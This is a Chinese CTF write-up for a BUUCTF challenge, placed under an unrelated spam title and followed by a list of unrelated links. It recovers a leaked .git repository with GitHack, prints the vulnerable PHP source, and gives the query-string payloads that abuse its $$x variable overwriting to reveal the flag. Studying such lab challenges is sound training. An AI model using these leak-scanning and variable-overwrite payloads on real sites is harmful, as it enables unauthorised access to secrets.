当前位置: 首页 > news >正文

营销网站制作要素erp软件公司有哪些

营销网站制作要素,erp软件公司有哪些,如何安装wordpress的插件,滨海建设局官方网站打开题目 发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下 http://63f29a80-e08b-43ae-a6d0-8e70fb02ea…

打开题目

发现这么多链接,以为要一点点去找功能上的漏洞。当你源代码,dirsearch,抓包等等操作之后,发现什么都没有。所以这题又是一道源码泄露题,上GItHack。扫描结果如下

http://63f29a80-e08b-43ae-a6d0-8e70fb02eaa3.node5.buuoj.cn:81/.git

主要代码在index里面

<?php
 
include 'flag.php';
 
$yds = "dog";
$is = "cat";
$handsome = 'yds';
 
foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}
 
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
 
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
 
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
 
echo "the flag is: ".$flag;

根据源代码,需要通过get传参达到变量覆盖的目的。 

?yds=flag

覆盖is变量

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

Get或Post传入flag=flag,触发变量覆盖代码

foreach($_POST as $x => $y){
    $$x = $y;   //$flag=1
}
 
foreach($_GET as $x => $y){
    $$x = $$y;   
}

输出?is=flag&flag=flag

再覆盖覆盖handsome变量

handsome=flag,得到$handsome=$flag

?handsome=flag&flag=handsome

可以得到flag

http://www.yayakq.cn/news/144709/

相关文章:

  • 广州微信网站设计推荐几个设计网站
  • wordpress+爱情主题成都网站营销seo电话
  • 网站建设套餐报域名分析网站
  • 做网站公司赚不赚钱张槎网站建设制作
  • 高端设计网站建设汽配网站建设成本
  • 井陉矿区网站建设企业网银怎么登录
  • 温州网站排名优化公司哪家好建设银行有没有全球门户网站
  • 网站评估 源码网络推广工作室
  • 简述营销型企业网站建设的内容建筑网名
  • 设计名字的网站宝安网站制作公司
  • 设计专业考研平面素材网站微信小程序点餐系统怎么做
  • 太原网站开发定制制作个人网站步骤
  • 做毕业网站的流程wordpress评论采集发布
  • 创业 建网站东纺服装人才网
  • 电力建设工程最好的网站网页设计专业课程介绍
  • 湖北网站定制开发价格表调试网站解析域名影响
  • 国外设计工作室网站软文发布
  • 公司网站建设开发方案网站活动页面
  • 深圳做外贸网站公司移动版网站开发
  • 电子商务专业网站免费建工作室网站
  • 成立一间网站开发公司枣庄做网站的公司
  • 营销型网站建设的五力原则梅林关网站建设
  • 中国制造网 做网站费用网站制作潍坊
  • 网站页面制作公司成都市公园城市建设管理局网站
  • 网站建设开发服务费下什么科目六安官网
  • 湖北省建设厅网站a群wordpress通知公告
  • 成都淘宝网站建设wordpress 破解主题下载地址
  • 网站大全官网怎么做宣传
  • php 企业网站 后台图片上传网站建设建设公司资质要求
  • 网站 左右浮动 广告有没有做羞羞事的网站